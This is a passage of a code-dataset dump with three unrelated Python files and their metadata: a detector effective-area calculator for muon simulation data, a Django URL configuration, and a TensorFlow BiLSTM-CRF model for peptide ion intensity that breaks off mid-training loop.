array, shape=(len(lab),)\n Label for M classification\n\n labels_R : array, shape=(len(lab),)\n Label for R regression\n \"\"\"\n label_S = (label[\"Hoinka_Labels_label_in\"].values == 1.0)\n label_M = (label[\"Hoinka_Labels_n_mu_stop\"].values == 1) & label_S\n label_R = label[\"Hoinka_Labels_true_stop_z\"].values\n zenith_splinempe = att[\"Hoinka_zenith_SplineMPE\"].values\n zenith_true = label[\"Hoinka_Labels_zenith_true\"].values\n azimuth_splinempe = att[\"Hoinka_azimuth_SplineMPE\"].values\n azimuth_true = label[\"Hoinka_Labels_azimuth_true\"].values\n ang_error = np.arccos(np.cos(azimuth_true-azimuth_splinempe) * np.sin(zenith_true) * np.sin(zenith_splinempe) +\n np.cos(zenith_true) * np.cos(zenith_splinempe))\n # label_Q = (ang_error < 0.1)\n label_Q = np.log10(ang_error)\n return label_S, label_Q, label_M, label_R\n\n\ndef calc_generated_area(radius, height, zenith):\n return np.pi * 2 * radius * np.cos(zenith) + 2 * radius * height * np.sin(zenith)\n\n\ndef main(input_pre, input_post, mc_input, model_path, output, eMin, eMax, zenMax, ebins, zenbins, n_batches,\n read_pickle=False):\n cut = zenMax / 180 * np.pi\n\n print(\"*****Step1: calculate effective area by zenith angle from muon gun data\")\n\n result = None\n\n input_pre_list = input_pre.split(\",\")\n input_post_list = 
input_post.split(\",\")\n\n total_count = 0\n l4_count = 0\n ssm_true_count = 0\n ssm_est_count = 0\n ssm_est_hq_count = 0\n\n for i in range(len(input_pre_list)):\n f_pre = input_pre_list[i]\n f_post = input_post_list[i]\n print(\"Loading data from %s and %s ...\" % (f_pre, f_post))\n\n file_pre = h5py.File(f_pre)\n file_post = h5py.File(f_post)\n\n steps_pre = np.linspace(0, file_pre['Hoinka_Labels'].size, num=n_batches+1).astype(int)\n steps_post = np.linspace(0, file_post['Hoinka_Labels'].size, num=n_batches+1).astype(int)\n\n intervals_pre = [(steps_pre[i], steps_pre[i + 1]) for i in range(len(steps_pre) - 1)]\n intervals_post = [(steps_post[i], steps_post[i + 1]) for i in range(len(steps_post) - 1)]\n\n for n, batches in enumerate(zip(intervals_pre, intervals_post)):\n print(\"...Processing batch %i\" % n)\n\n # read labeled (pre-sim) mgs-data\n # pre_data = pd.read_hdf(input_pre, key='Hoinka_Labels')\n pre_data, _, pre_data_weight, _ = load_data_mgs(file_pre, batches[0], verbosity=False)\n pre_data['MuonWeight'] = pre_data_weight\n store_total = len(pre_data.index)\n pre_data= pre_data[pre_data.Hoinka_Labels_zenith_true < cut]\n true_stopping = pre_data[pre_data.Hoinka_Labels_label_in > 0][\n ['Hoinka_Labels_azimuth_true', 'Hoinka_Labels_zenith_true', 'Hoinka_Labels_energy_stop',\n 'Hoinka_Labels_true_stop_z', 'Hoinka_Labels_n_mu_stop', 'MuonWeight']]\n\n pre_data.reset_index(inplace=True, drop=True)\n pre_data['Hoinka_Labels_zenith_true_cos'] = np.cos(pre_data.Hoinka_Labels_zenith_true)\n\n true_stopping.reset_index(inplace=True, drop=True)\n true_stopping['Hoinka_Labels_zenith_true_cos'] = np.cos(true_stopping.Hoinka_Labels_zenith_true)\n\n # import models\n models = joblib.load(model_path)\n\n # read level 3 mgs-data\n post_data, att, post_data_weight, _ = load_data_mgs(file_post, batches[1], verbosity=False)\n\n store_l4 = len(post_data.index)\n\n # apply s-classificator to level3 data\n proba_s = models['s'][1].predict_proba(att[models['s'][0]])[:, 1]\n proba_m = models['m'][1].predict_proba(att[models['m'][0]])[:, 1]\n predict_q = models['q'][1].predict(att[models['q'][0]])\n zenith_splinempe = att[\"Hoinka_zenith_SplineMPE\"]\n del att\n\n # apply cut to labeled level 3 data at 0.74 for 95% purity\n # post_data = pd.read_hdf(input_post, key='Hoinka_Labels')\n post_data['MuonWeight'] = post_data_weight\n predicted_stopping = post_data[(proba_m > 0.79) & (predict_q < -0.6) & (zenith_splinempe < cut)][\n ['Hoinka_Labels_azimuth_true', 'Hoinka_Labels_zenith_true', 'Hoinka_Labels_energy_stop',\n 'Hoinka_Labels_true_stop_z', 'Hoinka_Labels_n_mu_stop', 'MuonWeight']]\n\n predicted_stopping.reset_index(inplace=True, drop=True)\n predicted_stopping['Hoinka_Labels_zenith_true_cos'] = np.cos(predicted_stopping.Hoinka_Labels_zenith_true)\n\n # perform aggregation and store results\n zen_bins = np.linspace(np.cos(cut), 1, num=zenbins+1)\n\n pre_data['zen_bin'] = pd.cut(pre_data['Hoinka_Labels_zenith_true_cos'], zen_bins)\n pre_data_agg = pre_data[['MuonWeight', 'zen_bin']].groupby('zen_bin').sum()\n\n true_stopping['zen_bin'] = pd.cut(true_stopping['Hoinka_Labels_zenith_true_cos'], zen_bins)\n true_stopping_agg = true_stopping[['MuonWeight', 'zen_bin']].groupby('zen_bin').sum()\n\n predicted_stopping['zen_bin'] = pd.cut(predicted_stopping['Hoinka_Labels_zenith_true_cos'], zen_bins)\n predicted_stopping_agg = predicted_stopping[['MuonWeight', 'zen_bin']].groupby('zen_bin').sum()\n\n if result is None:\n result = pd.concat({'true_count': true_stopping_agg, 'predicted_count': 
predicted_stopping_agg,\n 'total_count': pre_data_agg}, axis=1)\n result.fillna(0, inplace=True)\n else:\n result.true_count += true_stopping_agg.fillna(0)\n result.predicted_count += predicted_stopping_agg.fillna(0)\n result.total_count += pre_data_agg.fillna(0)\n\n total_count += store_total\n l4_count += store_l4\n ssm_true_count += len(post_data[post_data.Hoinka_Labels_label_in > 0].index)\n ssm_est_count += len(post_data[(proba_m > 0.79)].index)\n ssm_est_hq_count += len(post_data[(proba_m > 0.79) & (predict_q < -0.6) & (zenith_splinempe < cut)].index)\n\n # prevent divisions by zero\n result.total_count = result['total_count'].replace(0.0, 1.0)\n result.true_count = result['true_count'].replace(0.0, 1.0)\n\n # calc effective areas\n result['effective_area'] = A_sim * result['predicted_count'] / result['true_count']\n result['effective_area_total'] = A_sim * result['predicted_count'] / result['total_count']\n\n result.to_csv(\"%s/effArea_mgs.csv\" % output, sep='\\t')\n\n joblib.dump(result, \"%s/effArea_mgs.pickle\" % output)\n\n print('total_count : %i' % total_count)\n print('l4_count : %i' % l4_count)\n print('ssm_true_count : %i' % ssm_true_count)\n print('ssm_est_count : %i' % ssm_est_count)\n print('ssm_est_hq_count : %i' % ssm_est_hq_count)\n\n print(\"*****Step2: calculate effective area by muon energy from corsica data\")\n\n if read_pickle == False:\n # read corsica mc data and write to df\n df_list_true = []\n df_list_est = []\n\n for f in mc_input.split(\",\"):\n print(\"Loading data from %s ...\" % f)\n\n file = h5py.File(f)\n n_input_lines = file['Hoinka_Labels'].size\n\n steps = np.linspace(0, n_input_lines, num=n_batches+1).astype(int)\n\n intervals = [(steps[i], steps[i + 1]) for i in range(len(steps) - 1)]\n\n for n, batch in enumerate(intervals):\n print(\"...Processing batch %i\" % n)\n lab, att, wgt, grp = load_data_corsica(file, batch, verbosity=False)\n\n models = joblib.load(model_path)\n\n proba_s = models['s'][1].predict_proba(att[models['s'][0]])[:, 1]\n estimate_q = models['q'][1].predict(att[models['q'][0]])\n proba_m = models['m'][1].predict_proba(att[models['m'][0]])[:, 1]\n estimate_r = models['r'][1].predict(att[models['r'][0]])\n\n lab_s, lab_q, lab_m, lab_r = gen_labels(lab, att)\n\n df = pd.DataFrame({'single_stopping': lab_m,\n 'quality': lab_q,\n 'zenith': lab[\"Hoinka_Labels_zenith_true\"],\n 'stop_z': lab[\"Hoinka_Labels_true_stop_z\"],\n 'energy_stop': lab[\"Hoinka_Labels_energy_stop\"],\n 'weight': wgt['G3'],\n 'weight_G4': wgt['G4'],\n 'weight_H': wgt['H']})\n\n df2 = pd.DataFrame({'single_stopping': proba_m,\n 'quality': estimate_q,\n 'zenith': att[\"Hoinka_zenith_SplineMPE\"],\n 'stop_z': estimate_r,\n 'energy_stop': lab[\"Hoinka_Labels_energy_stop\"],\n 'weight': wgt['G3'],\n 'weight_G4': wgt['G4'],\n 'weight_H': wgt['H']})\n\n df_list_true += [df]\n df_list_est += [df2]\n\n result_mc = pd.concat(df_list_true).reset_index()\n result_mc_est = pd.concat(df_list_est).reset_index()\n\n result_mc['zenith_cos'] = np.cos(result_mc.zenith)\n result_mc_est['zenith_cos'] = np.cos(result_mc_est.zenith)\n\n # store readout\n joblib.dump(result_mc, \"%s/df_corsica.pickle\" % output)\n joblib.dump(result_mc_est, \"%s/df_corsica_est.pickle\" % output)\n else:\n print(\"Loading data from %s/df_corsica.pickle ...\" % output)\n result_mc = joblib.load(\"%s/df_corsica.pickle\" % output)\n print(\"Loading data from %s/df_corsica_est.pickle ...\" % output)\n result_mc_est = joblib.load(\"%s/df_corsica_est.pickle\" % output)\n\n # reduce to single stopping 
events with zenith below max\n result_mc = result_mc[(result_mc.single_stopping) & (result_mc.zenith < cut)]\n\n # retrieve effective area by zenith from previous result\n zen_bins = np.linspace(np.cos(cut), 1, num=zenbins+1)\n result_mc['zen_bin'] = pd.cut(result_mc.zenith_cos, zen_bins)\n result_mc['effective_area'] = result.effective_area.loc[result_mc.zen_bin].values\n result_mc['effective_area_total'] = result.effective_area_total.loc[result_mc.zen_bin].values\n\n # aggregate by muon energy\n e_bins = np.logspace(np.log10(eMin), np.log10(eMax), num=ebins+1)\n result_mc['e_bin'] = pd.cut(result_mc.energy_stop, e_bins)\n\n result_mc.dropna(inplace=True)\n\n result_mc_agg = result_mc[['effective_area', 'e_bin']].groupby('e_bin').\\\n agg(lambda x: np.average(x,weights=result_mc.loc[x.index, \"weight\"]))\n\n result_mc_agg.fillna(0.0, inplace=True)\n\n result_mc_agg_total = result_mc[['effective_area_total', 'e_bin']].groupby('e_bin'). \\\n agg(lambda x: np.average(x, weights=result_mc.loc[x.index, \"weight\"]))\n\n result_mc_agg_total.fillna(0.0, inplace=True)\n\n # store aggregation result\n result_mc_agg.to_csv(\"%s/effArea_mgs_corsica.csv\" % output, sep='\\t')\n result_mc_agg_total.to_csv(\"%s/effArea_mgs_corsica_total.csv\" % output, sep='\\t')\n\n joblib.dump(result_mc_agg, \"%s/effArea_mgs_corsica.pickle\" % output)\n joblib.dump(result_mc_agg_total, \"%s/effArea_mgs_corsica_total.pickle\" % output)\n\n print(\"*****Finished Successfully!\")\n\n\nif __name__ == \"__main__\":\n args = docopt(__doc__)\n main(args[\"PRE\"], args[\"POST\"], args[\"MC\"], args[\"MODELS\"], args[\"OUTPUT\"], float(args[\"EMIN\"]),\n float(args[\"EMAX\"]), float(args[\"ZENMAX\"]), int(args[\"EBINS\"]), int(args[\"ZENBINS\"]), int(args[\"BATCHES\"]),\n args[\"--read_pickle\"])\n", "sub_path": "effectiveAreaEstimation/effectiveAreaCalculator.py", "file_name": "effectiveAreaCalculator.py", "file_ext": "py", "file_size_in_byte": 13243, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "numpy.pi", "line_number": 29, "usage_type": "attribute"}, {"api_name": "numpy.arccos", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.log10", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 72, "usage_type": "attribute"}, {"api_name": "numpy.cos", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 77, "usage_type": "attribute"}, {"api_name": "h5py.File", "line_number": 97, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 101, "usage_type": "call"}, {"api_name": "dataMethods_mgs.load_data", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 123, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib.load", "line_number": 126, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib", "line_number": 126, "usage_type": "name"}, {"api_name": "dataMethods_mgs.load_data", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.cos", 
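Note: the effective-area step in the record above reduces to a weighted ratio of predicted to true stopping counts per cos(zenith) bin, scaled by the generation-cylinder surface A_sim. The following standalone sketch restates that step for clarity; the function and column names (effective_area_by_zenith, zenith, weight) are invented for illustration and are not part of the record.

import numpy as np
import pandas as pd

def effective_area_by_zenith(true_df, pred_df, cut, n_bins, a_sim):
    # Bin weighted event counts in cos(zenith), then scale the
    # predicted/true ratio by the simulated generation surface a_sim.
    bins = np.linspace(np.cos(cut), 1.0, num=n_bins + 1)
    true_w = true_df.groupby(pd.cut(np.cos(true_df["zenith"]), bins))["weight"].sum()
    pred_w = pred_df.groupby(pd.cut(np.cos(pred_df["zenith"]), bins))["weight"].sum()
    true_w = true_w.replace(0.0, 1.0)  # same division-by-zero guard as the script
    return a_sim * pred_w / true_w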
"line_number": 148, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 151, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 151, "usage_type": "call"}, {"api_name": "pandas.cut", "line_number": 153, "usage_type": "call"}, {"api_name": "pandas.cut", "line_number": 156, "usage_type": "call"}, {"api_name": "pandas.cut", "line_number": 159, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 163, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib.dump", "line_number": 187, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib", "line_number": 187, "usage_type": "name"}, {"api_name": "h5py.File", "line_number": 205, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 208, "usage_type": "call"}, {"api_name": "dataMethods_corsica.load_data", "line_number": 214, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib.load", "line_number": 216, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib", "line_number": 216, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 225, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 234, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 246, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 247, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 249, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 250, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib.dump", "line_number": 253, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib", "line_number": 253, "usage_type": "name"}, {"api_name": "sklearn.externals.joblib.dump", "line_number": 254, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib", "line_number": 254, "usage_type": "name"}, {"api_name": "sklearn.externals.joblib.load", "line_number": 257, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib", "line_number": 257, "usage_type": "name"}, {"api_name": "sklearn.externals.joblib.load", "line_number": 259, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib", "line_number": 259, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 265, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 265, "usage_type": "call"}, {"api_name": "pandas.cut", "line_number": 266, "usage_type": "call"}, {"api_name": "numpy.logspace", "line_number": 271, "usage_type": "call"}, {"api_name": "numpy.log10", "line_number": 271, "usage_type": "call"}, {"api_name": "pandas.cut", "line_number": 272, "usage_type": "call"}, {"api_name": "numpy.average", "line_number": 277, "usage_type": "call"}, {"api_name": "numpy.average", "line_number": 282, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib.dump", "line_number": 290, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib", "line_number": 290, "usage_type": "name"}, {"api_name": "sklearn.externals.joblib.dump", "line_number": 291, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib", "line_number": 291, "usage_type": "name"}, {"api_name": "docopt.docopt", "line_number": 297, "usage_type": "call"}]} +{"seq_id": "83241911", "text": "from django.conf.urls import url, include\nfrom django.contrib import admin\n\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^', include('basic.urls')),\n url(r'^docker/', include('docker.urls') ),\n url(r'^vm/', include('vm.urls') ),\n url(r'^twitter/', 
include('twitter.urls') ),\n url(r'^client/', include('client.urls') ),\n\n]\n\n\nif settings.DEBUG:\n\turlpatterns+= ( static(settings.STATIC_URL) )\n", "sub_path": "hadoop/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 499, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 9, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 9, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 10, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 11, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 12, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 12, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 13, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 13, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 14, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 14, "usage_type": "call"}, {"api_name": "django.conf.settings.DEBUG", "line_number": 19, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 19, "usage_type": "name"}, {"api_name": "django.conf.urls.static.static", "line_number": 20, "usage_type": "call"}, {"api_name": "django.conf.settings.STATIC_URL", "line_number": 20, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 20, "usage_type": "name"}]} +{"seq_id": "159701427", "text": "import tensorflow as tf\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nfrom sklearn.cluster import KMeans\r\nfrom sklearn import preprocessing\r\nimport random\r\n\r\n\r\n\r\nimport sys \r\nimport os\r\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\r\ndirs = os.path.join( os.path.dirname(__file__),'..')\r\nos.sys.path.append(os.path.join( os.path.dirname(__file__), '..'))\r\nfrom tools.get_data import GetData\r\nfrom tools.pearson import CalcPerson\r\n\r\nimport argparse\r\n\r\n\r\ndef parse_args():\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('--is-train', type=int, default=0,help='1=train, 2=test, 0=train and test')\r\n parser.add_argument('--num-iter', type=int, default=100,help='the number of training steps to take')\r\n parser.add_argument('--batch-size', type=int, default=512,help='the number of peptide')\r\n parser.add_argument('--keep-prob', type=float, default=0.5,help='')\r\n parser.add_argument('--learning-rate', type=float, default=1e-3,help='')\r\n parser.add_argument('--input-size', type=int, default=185,help='')\r\n parser.add_argument('--num-classes', type=int, default=10,help='')\r\n parser.add_argument('--output-size', type=int, default=1,help='predict ionic strength')\r\n parser.add_argument('--layer-num', type=int, default=2,help='')\r\n parser.add_argument('--cell-size', type=int, default=650,help='')\r\n parser.add_argument('--intensity_num_label', type=int, default=1, help=\"\") \r\n return parser.parse_args()\r\n\r\nclass LSTM(object):\r\n def __init__(self, args):\r\n self.max_time = tf.placeholder(shape=None,dtype=tf.int32,name='max_time')\r\n self.input_size = 
args.input_size\r\n self.output_size = args.output_size\r\n self.cell_size = args.cell_size\r\n self.batch_size=tf.placeholder(shape=None,dtype=tf.int32,name='batch_size')\r\n self.layer_num=args.layer_num\r\n self.learning_rate=args.learning_rate\r\n self.num_classes=args.num_classes\r\n self.keep_prob=tf.placeholder(shape=None,dtype=tf.float32,name='keep_prob')\r\n self.seq_length = tf.placeholder(tf.float32,[None],name='seq_length')\r\n #self.batch_size = batch_size\r\n \r\n with tf.name_scope('inputs'):\r\n self.X = tf.placeholder(tf.float32, [None, None, self.input_size], name='X')\r\n self.y = tf.placeholder(tf.int32, [None, None], name='y')\r\n with tf.variable_scope('in_hidden'):\r\n self.add_input_layer()\r\n with tf.variable_scope('LSTM_cell'):\r\n self.add_cell()\r\n with tf.variable_scope('out_hidden'):\r\n self.add_output_layer()\r\n with tf.variable_scope('loss'):\r\n self.add_crf_layer()\r\n with tf.name_scope('train'):\r\n self._params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES)\r\n #regularization= 0.001* tf.reduce_sum([ tf.nn.l2_loss(v) for v in self._params ])\r\n self.train_op = tf.train.AdamOptimizer(self.learning_rate).minimize(self.loss,var_list=self._params)\r\n def add_input_layer(self,):\r\n l_in_x = tf.reshape(self.X, [-1, self.input_size], name='2_2D') # (batch*n_step, in_size)\r\n Ws_in = self._weight_variable([self.input_size, self.cell_size])\r\n \r\n bs_in = self._bias_variable([self.cell_size,])\r\n with tf.name_scope('Wx_plus_b'):\r\n l_in_y =tf.matmul(l_in_x, Ws_in) + bs_in\r\n self.l_in_y = tf.reshape(l_in_y, [-1, self.max_time, self.cell_size], name='2_3D')\r\n\r\n def add_cell(self):\r\n lstm_fw_cell =tf.nn.rnn_cell.LSTMCell(self.cell_size)\r\n lstm_bw_cell = tf.nn.rnn_cell.LSTMCell(self.cell_size)\r\n\r\n lstm_fw_cell = tf.contrib.rnn.DropoutWrapper(cell=lstm_fw_cell, input_keep_prob=self.keep_prob)\r\n lstm_bw_cell = tf.contrib.rnn.DropoutWrapper(cell=lstm_bw_cell, input_keep_prob=self.keep_prob)\r\n \r\n\r\n mlstm_fw_cell = tf.nn.rnn_cell.MultiRNNCell([lstm_fw_cell] * self.layer_num, state_is_tuple=True)\r\n mlstm_bw_cell = tf.nn.rnn_cell.MultiRNNCell([lstm_bw_cell] * self.layer_num, state_is_tuple=True)\r\n self.seq_length = tf.cast(self.seq_length, tf.int32) \r\n #with tf.name_scope('initial_state'):\r\n # self.cell_init_state = mlstm_cell.zero_state(tf.shape(self.batch_size)[0], dtype=tf.float32)\r\n #lstm_inputs=tf.unstack(self.l_in_y, self.max_time, 1)\r\n (self.output_fw, self.output_bw), self.states = tf.nn.bidirectional_dynamic_rnn(\r\n mlstm_fw_cell,\r\n mlstm_bw_cell,\r\n self.l_in_y,\r\n sequence_length=self.seq_length,\r\n dtype=tf.float32 )\r\n\r\n def add_output_layer(self):\r\n \r\n l_out_x =tf.reshape(tf.concat([self.output_fw, self.output_bw],axis=2), [-1, self.cell_size * 2])\r\n Ws_out = self._weight_variable([self.cell_size*2, self.num_classes])\r\n tf.summary.histogram('Ws_out',Ws_out)\r\n bs_out = self._bias_variable([self.num_classes, ])\r\n tf.summary.histogram('bs_out',bs_out)\r\n with tf.name_scope('Wx_plus_b'):\r\n self.lstm_outputs =tf.matmul(l_out_x, Ws_out) + bs_out\r\n \r\n \r\n\r\n def add_crf_layer(self):\r\n scores = tf.reshape(self.lstm_outputs, [-1, self.max_time, self.num_classes])\r\n\r\n \r\n \r\n if True:\r\n # Linear-CRF.\r\n log_likelihood, self.transition_params = tf.contrib.crf.crf_log_likelihood(scores, tf.reshape(self.y,[-1,self.max_time]),tf.cast(self.seq_length, tf.int32)) #loss=MLP(pred,lable)\r\n\r\n self.loss = tf.reduce_mean(-log_likelihood)\r\n\r\n self.tags, best_score = 
tf.contrib.crf.crf_decode(scores, self.transition_params, tf.cast(self.seq_length, tf.int32))\r\n\r\n #reshape_label=tf.reshape(tf.cast(self.y,tf.float32),[-1,1])\r\n #reshape_tags=tf.reshape(tf.cast(self.tags,tf.float32),[-1,1])\r\n\r\n\r\n #self.mse_bias=tf.losses.mean_squared_error(reshape_tags,reshape_label)\r\n\r\n #self.loss+=(self.mse_bias*0.1)\r\n\r\n #pred=1/(1+tf.exp(-tf.reshape(tf.cast(self.tags,tf.float32),[-1,1])))\r\n #lable_p=1/(1+tf.exp(-tf.reshape(tf.cast(self.y,tf.float32),[-1,1])))\r\n #cross_entropy = -lable_p * tf.log(pred) -(1-lable_p) * tf.log(1-pred)\r\n #reduce_sum = tf.reduce_sum(cross_entropy, 1)\r\n #rank_loss = tf.reduce_mean(reduce_sum)\r\n #self.loss+=rank_loss\r\n\r\n else:\r\n losses = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=scores,\r\n labels=self.y)\r\n mask = tf.sequence_mask(tf.cast(self.seq_length, tf.int32))\r\n losses = tf.boolean_mask(losses, mask)\r\n self.loss = tf.reduce_mean(losses)\r\n\r\n self.tags = tf.argmax(scores, axis=-1)\r\n self.tags = tf.cast(self.tags, tf.int32)\r\n tf.summary.scalar('loss', self.loss)\r\n tf.add_to_collection('pred_network', self.tags)\r\n \r\n\r\n\r\n #def compute_cost(self,pred,label):\r\n # losses = tf.contrib.nn.seq2seq.sequence_loss_by_example(\r\n # [tf.reshape(pred, [-1], name='reshape_pred')],\r\n # [tf.reshape(label, [-1], name='reshape_target')],\r\n # [tf.ones([self.batch_size * self.max_time], dtype=tf.float32)],\r\n # average_across_timesteps=True,\r\n # softmax_loss_function=self.ms_error,\r\n # name='losses'\r\n # )\r\n # loss = tf.div(\r\n # tf.reduce_sum(losses, name='losses_sum'),\r\n # tf.cast(self.batch_size,tf.float32),\r\n # name='average_loss')\r\n # return loss\r\n #tf.summary.scalar('loss', self.loss)\r\n @staticmethod\r\n def ms_error(labels, logits):\r\n return tf.square(tf.subtract(labels, logits))\r\n\r\n def _weight_variable(self, shape, name='weights'):\r\n #initializer = tf.random_normal_initializer(mean=0., stddev=1.,)\r\n return tf.get_variable(shape=shape, name=name)\r\n\r\n def _bias_variable(self, shape, name='biases'):\r\n #initializer = tf.constant_initializer(0.1)\r\n return tf.get_variable(name=name, shape=shape)\r\n\r\ndef get_batch_peptide(merge_list,_batch_size):\r\n number_of_peptide=len(merge_list[0])\r\n batch_peptide=[]\r\n seq_length=[]\r\n _batch_number=int(number_of_peptide/_batch_size)\r\n for i in range(_batch_number):\r\n batch_peptide.append(merge_list[0][i*_batch_size:(i+1)*_batch_size])\r\n seq_length.append([])\r\n for j in range(len(batch_peptide[i])):\r\n seq_length[len(batch_peptide)-1].append(len(merge_list[0][i*_batch_size+j]))\r\n if _batch_number*_batch_size < number_of_peptide:\r\n seq_length.append([])\r\n batch_peptide.append(merge_list[0][_batch_number*_batch_size:])\r\n for k in range(len(batch_peptide[-1])):\r\n seq_length[len(batch_peptide)-1].append(len(merge_list[0][_batch_number*_batch_size+k]))\r\n _batch_number+=1\r\n return batch_peptide,_batch_number,seq_length\r\n\r\ndef padding_data(data,flag,max_ions_number):\r\n if flag ==1 :\r\n _ydim=data.shape[1]\r\n else:\r\n _ydim=data.shape[0]\r\n #_ydim=data.shape[1]\r\n dv=max_ions_number-data.shape[0]\r\n data=data.tolist()\r\n if dv > 0:\r\n if flag ==1:\r\n data.extend(np.zeros((dv,_ydim)).astype('int32').tolist())\r\n else:\r\n data.extend(np.zeros((dv,)).astype('int32').tolist())\r\n #data.extend(np.zeros((dv,_ydim)).tolist())\r\n return data\r\n\r\ndef model_train(args):\r\n model = LSTM(args)\r\n with tf.Session() as sess:\r\n merged = tf.summary.merge_all()\r\n writer = 
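Note: the add_crf_layer method in the record above scores tag sequences with per-step unary outputs plus a learned transition matrix and decodes the best path with tf.contrib.crf.crf_decode. As a reference for what that decode step computes, here is a minimal NumPy Viterbi sketch for a single sequence; it is an illustrative stand-in, not the author's implementation.

import numpy as np

def viterbi_decode(scores, transitions):
    # scores: (T, K) unary potentials for T steps and K tags;
    # transitions[i, j]: score of moving from tag i to tag j.
    T, K = scores.shape
    trellis = np.zeros((T, K))
    backpointers = np.zeros((T, K), dtype=np.int64)
    trellis[0] = scores[0]
    for t in range(1, T):
        cand = trellis[t - 1][:, None] + transitions  # all (prev, cur) pairs
        backpointers[t] = cand.argmax(axis=0)
        trellis[t] = cand.max(axis=0) + scores[t]
    path = [int(trellis[-1].argmax())]
    for t in range(T - 1, 0, -1):
        path.append(int(backpointers[t, path[-1]]))
    return path[::-1], float(trellis[-1].max())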
tf.summary.FileWriter(\"lstm-logs\", sess.graph)\r\n init = tf.global_variables_initializer()\r\n sess.run(init)\r\n #train data\r\n _,_,train_X,train_y,merge_train_list=data.get_discretization_data('data/data_swedcad_mm/am/train_1label.txt',args.num_classes)\r\n print(str(len(merge_train_list[0]))+' train peptides ,DataShape:('+str(np.array(train_X).shape)+str(np.array(train_y).shape)+')')\r\n batch_peptide,_batch_number,seq_length=get_batch_peptide(merge_train_list,args.batch_size)\r\n\r\n #val data\r\n _,_,val_X,val_y,merge_val_list=data.get_discretization_data('data/data_swedcad_mm/am/test_1label.txt',args.num_classes)\r\n print(str(len(merge_val_list[0]))+' val peptides ,DataShape:('+str(np.array(val_X).shape)+str(np.array(val_y).shape)+')')\r\n val_batch_peptide,val_batch_number,val_seq_length=get_batch_peptide(merge_val_list,args.batch_size)\r\n \r\n #if len(seq_length[-1]) < args.batch_size:\r\n # seq_length[-1].extend([0]*(args.batch_size-len(seq_length[-1])))\r\n print('..trainning')\r\n \r\n for Iter in range(args.num_iter):\r\n train_acc=0;train_loss=0\r\n\t\t\t\r\n permutation_batch = np.random.permutation(len(batch_peptide))\r\n suffled_batch_peptide=np.array(batch_peptide)[permutation_batch].tolist()\r\n suffled_seq_length=np.array(seq_length)[permutation_batch].tolist()\r\n\t\t\t\r\n for i,(train_piptide_index) in enumerate(suffled_batch_peptide):\r\n X=[];y=[];\r\n\t\t\t\t\r\n max_ions_number=max(suffled_seq_length[i])\r\n permutation_peptide = np.random.permutation(len(train_piptide_index))\r\n suffled_seq=np.array(suffled_seq_length[i])[permutation_peptide].tolist()\r\n 